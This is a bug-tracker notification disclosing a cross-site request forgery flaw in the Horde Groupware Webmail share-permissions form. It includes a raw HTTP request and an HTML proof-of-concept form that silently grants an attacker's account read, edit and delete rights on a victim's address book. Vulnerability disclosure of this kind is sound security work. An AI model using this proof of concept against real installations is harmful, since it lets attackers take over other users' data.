[Tickets #12804] CSRF in changing permissions functionality

noreply at bugs.horde.org noreply at bugs.horde.org
Mon Oct 28 23:18:33 UTC 2013 

DO NOT REPLY TO THIS MESSAGE. THIS EMAIL ADDRESS IS NOT MONITORED.

Ticket URL: http://bugs.horde.org/ticket/12804
------------------------------------------------------------------------------
  Ticket             | 12804
  Created By         | m.benetrix at e-secure.com.au
  Summary            | CSRF in changing permissions functionality
  Queue              | Horde Groupware Webmail Edition
  Version            | 5.1.2
  Type               | Bug
  State              | Unconfirmed
  Priority           | 3. High
  Milestone          |
  Patch              |
  Owners             |
------------------------------------------------------------------------------


m.benetrix at e-secure.com.au (2013-10-28 23:18) wrote:

I found another one, a CSRF while a change of permissions is  
requested. It was found that this form misses a unique token

Request:
POST /horde/services/shares/edit.php HTTP/1.1
Host: victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101
Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: session=a0db6c30e697fe3da03f9f437a63bb3f
Content-Type: application/x-www-form-urlencoded
Content-Length: 252

actionID=editform&cid=37&app=turba&owner_input=kenedyK&u_names%5B%7C%7Cnew_input%5D=AttackerUserName&u_read%5B%7C%7Cnew_input%5D=on&u_edit%5B%7C%7Cnew_input%5D=on&u_delete%5B%7C%7Cnew_input%5D=on&g_names%5B%7C%7Cnew%5D=&save_and_finish=Save+and+Finish


PoC

<html>

   <body>
     <form action="www.victim.com/horde/services/shares/edit.php"
method="POST">
       <input type="hidden" name="actionID" value="editform" />
       <input type="hidden" name="cid" value="37" />
       <input type="hidden" name="app" value="turba" />
       <input type="hidden" name="owner_input" value="kenedyK" />
       <input type="hidden"
name="u_names[||new_input]"
value="AttackerUserName" />
       <input type="hidden"
name="u_read[||new_input]" value="on" />
       <input type="hidden"
name="u_edit[||new_input]" value="on" />
       <input type="hidden"
name="u_delete[||new_input]" value="on" />
       <input type="hidden" name="g_names[||new]"
value="" />
       <input type="hidden" name="save_and_finish"
value="Save and Finish" />
       <input type="submit" value="Submit request" />
     </form>
   </body>
</html>


Conditions: The attacker must know the owner value which is the  
victim's username, and the ID of the address book. Once he gets them,  
he can launch the attack.

More information about the bugs mailing list